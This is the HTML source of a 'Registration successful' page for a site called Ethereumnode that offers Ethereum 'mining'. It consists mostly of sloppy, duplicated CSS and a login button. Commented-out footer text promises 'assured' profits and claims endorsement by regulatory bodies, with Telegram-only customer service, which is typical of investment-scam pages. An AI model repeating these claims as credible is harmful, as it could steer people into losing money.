
   <!DOCTYPE html>
   
   <html lang="en">
   
<head>
   <title> Ethereumnode | Registration successful </title>

<meta name="viewport" content="width=device-width, initial-scale=1" />
   <style type="text/css">


  
 
  
  .ul {
  font-size: 22px;
  color: blue;
  text-align: center;
  }
    

    body {
    margin: 0;
    padding: 0;
    background-image: url("https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img51.png");
        background-color:  hsla(240, 100%, 50%, 0.7);
    }
    
  .n
  {
  background-image: url("images/index2.png");
  color: red;



  }

   .vv {
      position: absolute;
      top: 5px;
      left: 8px;
   }
  

  
  
  .vv1 {
  border: 50px insert white;
  border-radius: 7px;
  background: hsla(240, 100%, 50%, 0.8);
      
  color: white;
  padding-left: 35px;
  padding-right: 35px;
  margin-right: 5px;
  margin-left: 1px;
  Font-size: 18px;
  
  }
    
    
    
    
    
    
    
      .center2 {
      margin-left: 0px;
      }
  
  
      #fuck3 {
      
      width: 60%;
      height: 25%;
      }
      

      
      
      .container1 {
      position: relative;
      height: 32px;
      top: -4px;
      }
      
      
      .bb1 {
      margin-left: 55%;
      }
      
     
     .bb2 {
     margin-left: 64.50%;
     }
     
     
     
     
     
     
     
     
     
     
     .man4 {
     box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.4), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
     }
     
     .form-container {
     margin: 20px;
     padding: 15px;
     background: #173459;
     color: white;
     box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
     }
     .input-cnt {
     display: flex; /* display the icon and the input in a line */
     margin-bottom: 15px;
     }
     .input-cnt:last-child {
     margin-bottom: 0px;
     }
     .input-cnt > i {
     min-width: 40px; /* set a minimum width for the icon */
     padding: 10px; /* make sure the icon is centered vertically */
     text-align: center; /* horizontally center the icon */
     background: lightgrey;
     border-top-left-radius: 20px;
     border-bottom-left-radius: 20px;
     color: #0076ff;
     }
     /* change styles when focused */
     .input-cnt:hover > i {
     background: #0076ff;
     color: white;
     }
     /* style the inputs */
     .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
     outline: none;
     border: none;
     padding: 7.20px;
     border: 1px solid lightgrey;
     border-top-right-radius: 20px;
     border-bottom-right-radius: 20px;
     width: 100%;
     }
     /* style the submit button */
     .input-cnt > input[type="submit"] {
     border: none;
     border-radius: 20px;
     outline: none;
     width: 75%;
     margin: 0 auto;
     font-size: 105%;
     padding: 8px;
     color: #0076ff;
     background: white;
     transition-duration: .5s;
     }
     /* add a hover effect for the submit button */
     .input-cnt > input[type="submit"]:hover {
     color: white;
     background: #0076ff;
     }
     
     #span1{
     border: 50px insert white;
     border-radius: 7px;
     background: hsla(240, 100%, 50%, 0.8);
     
     color: white;
     padding-left: 35px;
     padding-right: 35px;
     margin-right: 5px;
     margin-left: 1px;
     Font-size: 18px;
     
     }
     
     #scan1 {
     border: 20px insert white;
     border-radius: 1px;
     background: hsla(240, 100%, 50%, 0.8);
     
     color: white;
     padding-left: 30px;
     padding-right: 30px;
     margin-right: 1px;
     margin-left: 10px;
     Font-size: 10px;
     
     }
     
     
     
     
     
     
     
     
     
     
     
     form {
     
     background-color: white;
    height: 220px; 
     max-width: 80%;
     max-height: 1000px;
     margin: 5px auto;
     
     padding: 5px 20px;
     
     box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
     }
     
     body {
     background-image: ul("images/index2.png");
     background-repeat: no-repeat;
     position: relative;
     align: center;
     }
     
     
     
     .ul {
     font-size: 22px;
     color: blue;
     text-align: center;
     }
     
     * {
     box-sizing: border-box;
     }
     html, body {
     margin: 0;
     padding: 0;
     }
     
     
     
     
     
     
     
      
      
      
      .ul {
      font-size: 22px;
      color: blue;
      text-align: center;
      }
      
      
      hml, body {
      margin: 0;
      padding: 0;
      }
      
      .n
      {
      background-image: url("images/index2.png");
      color: red;
      
      
      
      }
      
      .vv {
      position: absolute;
      top: 5px;
      left: 8px;
      }
      
      
      
      
      .vv1 {
      border: 50px insert white;
      border-radius: 7px;
      background: hsla(240, 100%, 50%, 0.8);
      
      color: white;
      padding-left: 35px;
      padding-right: 35px;
      margin-right: 5px;
      margin-left: 1px;
      Font-size: 18px;
      
      }
      
      
      
      
      
      
      
      .center2 {
      margin-left: 0px;
      }
      
      
      #fuck4 {
      
      width: 9%;

      height: auto;
      height: 15px
      }
      
      #fuck3 {
      
      width: 35px;
      height: 23px;

      }
      
      
.container11 {
position: relative;
height: 160px;
}




      .bb1 {
      margin-left: 55%;
      }
      
      
      .bb2 {
      margin-left: 64.50%;
      }
      
      
      
      #fuck44 {
      position: absolute;
      width:170px;
      height: 25.50px;
      
      }

      
      
      
      
      
      
      
      
      
      
      #span {
      border: 50px insert white;
      border-radius: 7px;
      background: hsla(240, 100%, 50%, 0.8);
      
      color: white;
      padding-left: 35px;
      padding-right: 35px;
      margin-right: 5px;
      margin-left: 1px;
      Font-size: 18px;
      
      }
      
      
      
     .form11 {
     
     background-color: white;
     
     max-width: 80%;
     
     margin: 5px auto;
     
     padding: 5px 20px;
     
     box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.12);
     }
     
     
     
     
     
     
     
     
     
     
     
     
     * {
     box-sizing: border-box;
     }
     html, body {
     margin: 0;
     padding: 0;
     }
     form {
     box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.4), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
     }
     .form-container {
     margin: 20px;
     padding: 15px;
     background: #173459;
     color: white;
     box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
     }
     .input-cnt {
     display: flex; /* display the icon and the input in a line */
     margin-bottom: 15px;
     }
     .input-cnt:last-child {
     margin-bottom: 0px;
     }
     .input-cnt > i {
     min-width: 40px; /* set a minimum width for the icon */
     padding: 10px; /* make sure the icon is centered vertically */
     text-align: center; /* horizontally center the icon */
     background: lightgrey;
     border-top-left-radius: 20px;
     border-bottom-left-radius: 20px;
     color: #0076ff;
     }
     /* change styles when focused */
     .input-cnt:hover > i {
     background: #0076ff;
     color: white;
     }
     /* style the inputs */
     .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
     outline: none;
     border: none;
     padding: 7.20px;
     border: 1px solid lightgrey;
     border-top-right-radius: 20px;
     border-bottom-right-radius: 20px;
     width: 100%;
     }
     /* style the submit button */
     .input-cnt > input[type="submit"] {
     border: none;
     border-radius: 20px;
     outline: none;
     width: 75%;
     margin: 0 auto;
     font-size: 105%;
     padding: 8px;
     color: #0076ff;
     background: white;
     transition-duration: .5s;
     }
     /* add a hover effect for the submit button */
     .input-cnt > input[type="submit"]:hover {
     color: white;
     background: #0076ff;
     }
     
     #span {
     border: 50px insert white;
     border-radius: 7px;
     background: hsla(240, 100%, 50%, 0.8);
     
     color: white;
     padding-left: 35px;
     padding-right: 35px;
     margin-right: 5px;
     margin-left: 1px;
     Font-size: 18px;
     
     }
     
     .man5 {
     
     background-color: white;
     
     max-width: 315px;
     
     margin: 2px auto;
     
     padding: 2px 20px;
     
     box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
     
     }
     .man6 {
     color: #134580;
     font-size: 10px;
     }
     #uf {
     width: 15%;
     height: auto;
     height:  50px;
     }
     
      
      #man {
      border: 50px insert white;
      border-radius: 7px;
      background: hsla(240, 100%, 50%, 0.7);
      
      color: white;
      padding-left: 35px;
      padding-right: 35px;
      margin-right: 5px;
      margin-left: 1px;
      Font-size: 18px;
      
      }
      
      
      
      
      .container1 {
      position: relative;
      height: 35px;
      top: -4px;
      }
      
    /*  .button2:hover {
               background-color: white;
               color:        hsla(240, 100%, 25%, 0.9);;
               border: 1px solid hsla(240, 100%, 25%, 0.9);
               box-shadow: 0px 1px 1px 0px   hsla(240, 100%, 25%, 0.9);
               cursor: pointer;
               -webkit-transition-duration: 1s; /* for Safari */
          /*     transition-duration: 0.10s;
      }
      
      .button2 {
      border: white;
      height: 48px;
      width: 90%;
      border-radius: 30px;  
      bordner: 12px;
      font-size: 14px;
      background:   hsla(240, 100%, 25%, 0.9);
      color:  white;
      }
      */
      
      .button1:hover {
      background-color: hsla(0, 0%, 0%, 0.5);
      color:   white;
      border: none;
      box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
      cursor: pointer;
      -webkit-transition-duration: 0s; /* for Safari */
      transition-duration: 0s;
      }
      
      .button1 {
      position: relative;
      top: 7px;
               outline: none;
      border: none;
      height: 46px;
      width: 70%;
      border-radius: 30px;  
      bordner: 12px;
      font-size: 14px;
      background: white;
      color:  white;
      background:     hsla(240, 100%, 25%, 0.9);

      }
      

      
      
       
       .diver{
          border-radius: 5.50px;
       border-style: none;
        height: 216.50px;
   margin-left: 20px;
   margin-right: 20px;
       background: white;

       }
       
       .pi {
          margin-left: 5px;
          }
          
          
          #fuck3333 {
          position: relative;
          top: 3.50px;
                width: 5.50%;
          height: auto;
          height:  15px;
          }
          
          
          .ccc {
          position: relative;
          top: -30px;
          font-size: 16px;
          font-weight: bold;
          }   
          

</style>
</head>
      <body style="font-size: 15px; font-family: 'Montserrat Alternates', sans-serif;">
      <div class="container1" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
      <div class="vv">
      <b style="font-size: 13px">   

      <section>
             <small> <b>        
   


           <!--
           
           <b style="color: black; font-size: 16px">&nbsp;Welcome to ETHEREUM</b><b style="font-size: 10px">NODE</b> 
           <b style="font-size: 20px; color: black">|&nbsp;<b style="color: black;font-size: 16px"><u><a href="learnmore.html"style="text-decoration: none; color: black"> learn More..</u></a></b></b>
          <!--  <a href="indexETH(bar alert).html"style="text-decoration: none;"> 
          <!--    <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 20px">&nbsp;ETHEREUM </b><b style="font-size: 12.50px;">NODE</b></b>
           -->
           
           
           <!--             <small> <b>         <a href="indexETH(bar alert).html"style="text-decoration: none;">          <img id="fuck3" src="../images/index19.jpg" /></a><b style="color: hsla(0, 0%, 0%, 0.8); font-size: 13.50px; text-align: center">&nbsp;ETHEREUM </b><b style="font-size: 13.50px; text-align: center">NODE <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 13px; ">|</b></b><img id="fuck4" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img53.png" /><b style="text-align: center">Ethereum:<b style="color: hsla(0, 0%, 0%, 0.8); text-align: center">$1635.55 </b></b></dd></small>-->
       <!--    
           <b style="color: black; font-size: 9.50px">Welcome to ETHEREUM</b><b style="font-size: 5.50px">NODE</b> 
           <b style="font-size: 15px; color: black">|&nbsp;<b style="color: black;font-size: 9.50px">Easly mine and withdraw everyday<b style="font-size: 15px; color: black">&nbsp;|&nbsp;</b><u><a href="#more"style="text-decoration: none; color: black; font-size: 9.50">More>></u></a></b></b></b>
           <!--  <a href="indexETH(bar alert).html"style="text-decoration: none;"> 
           <!--    <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 20px">&nbsp;ETHEREUM </b><b style="font-size: 12.50px;">NODE</b></b>
           -->
           
           
          <!-- 
           
           </section>
      </span></span></section></div></div></b></b>
       
      </small>

    -->
    
    
    
          <b>
          </section>
          </span></span></section></div></div></b></b>
          
                <center class="ccc">   <span style="color: hsla(240, 100%, 25%, 0.9); font-size: 10px;">     <img id="fuck3333"src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img53.png">ETHEREUM</span><span style="color: white;: red; font-size: 10px;">NODE</span>
          
          </center>
          </small>
          </b>
          
          
          
       <p>&nbsp;</p>

       <p>&nbsp;</p>
       <p>&nbsp;</p>

       
       
       
       
       


    <div class="diver"><p style="color: blue; text-align: center">      <p>&nbsp;</p> <b style="font-size: 15.50px;"><center>Registration successful</center></b></p>
        <span class="man"style="font-size: 13px; text-align: center;"><p class="pi">Your registration is successful, you can login to your account now and join node to start mining  Ethereum. Click on the Log In button to log In to your account with your registered Username and Password.</span>
        
        
        
        
        
        
        <p> <center><a href="login.html"style="text-decoration: none;"><button class="button1">Log In</button></a>
        

        </center></p></div>
        
        
  </center>
      <!--    <center id="c">  <a href="Login.html"style="text-decoration: none"> <button class="button2">Log In</button></a></center>

        </form>
        
  -->
  
  <!--  <p> <center><a href="login.html"style="text-decoration: none;">
    
    
    <button class="button1">Log In</button></a>
    
    </center></center></p></p></p></form></form></small></small>

 -->
 
 
 


       <p>&nbsp;</p>

       <p>&nbsp;</p>
       <p>&nbsp;</p>

       
       
       
       <p>&nbsp;</p>
       
       <p>&nbsp;</p>
       
       
       <!--
       
       <body style="font-size: 15px; font-family: 'Montserrat Alternates', sans-serif;">
       <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
       <div class="vv">
       <b style="font-size: 13px">     
       
       <p>ABOUT</p></b>
       <p style="font-size: 10.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
       </p>
       <p style="font-size: 11.50px;"><b style="color: hsla(0, 0%, 0%, 0.3)"> ETHEREUM</b><b style="font-size: 7px">NODE</b> <b class="bb1"style="color: hsla(0, 0%, 0%, 0.8)">CONTACTS </b>  </p> </a></b>

        <section style="font-size: 11px;">     <a href="#"style="text-decoration: none;"> <span  style="color: hsla(0, 0%, 0%, 0.8)"> Home</span></a><span class="bb2">     <a href="indexcustomerservice.html"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">Customer service</span></a>
        <section style="font-size: 11px;">     <a href="##"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)"> FAQ</span></a><span class="bb2">     <a href="   https://t.me/ETH_Miner_Customer_Service"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">
        &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;   &nbsp;&nbsp;&nbsp;
        telegram link</span></a></span></section></span></section></div></div>
        
        
        -->
        <!--
        <body style="font-size: 11px; font-family: 'Montserrat Alternates', sans-serif;">
        <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
        <div class="vv">
        <b style="font-size: 11px">     
        
        <p id="more">ABOUT</p></b>
        <p style="font-size: 8.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
        </p>
        <p style="font-size: 9.50px;"><b style="color: hsla(0, 0%, 0%, 0.8)"> ETHEREUM</b><b style="font-size: 6px">NODE</b> <b class="bb1"><span class="span11"style="color: hsla(0, 0%, 0%, 0.8)"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CONTACTS</b>  </p> </a></b>
        
        <section style="font-size: 9px;"><span style="color: hsla(0, 0%, 0%, 0.8)">     <a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">  Home</a></span><span class="bb2">     <a href="indexcustomerservice.html"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Customer service</span></a>
        <section style="font-size: 9px;">     <a href="##"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)"> FAQ</span></a><span class="bb2">     <a href="   https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;telegram link </span>
        </a></span>
        
        
      
     -->
     
     
     <!--
     <body style="font-size: 11px; font-family: 'Montserrat Alternates', sans-serif;">
     <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
     <div class="vv">
     <b style="font-size: 11px">     
     <center>
     <p id="more"><u style="color: red"><span style="font-size: 9px;">ABOUT <b><span style=" color:  hsla(240, 100%, 25%, 0.9);">ETHEREUM</span><span style="color: white; font-size: 9">NODE</span></b></p></b></u>
     <p style="font-size: 8.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
     </p></center>
     
     <center class="uiu">
     
     <center class="uii"><span style="font-size: 9px; color: black"><a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">HOME</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;</span><span style="font-size: 9px; color: black"><a href="##"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">FAQ</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">CUSTOMER SERVICE</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">TELEGRAM LINK</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="##"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">NEWS</span>
     
     
     
          -->
           
     
      

      
      
      
      
      
      
      
      
      
      






     
     
     </body>
     </html>
     
     
     
     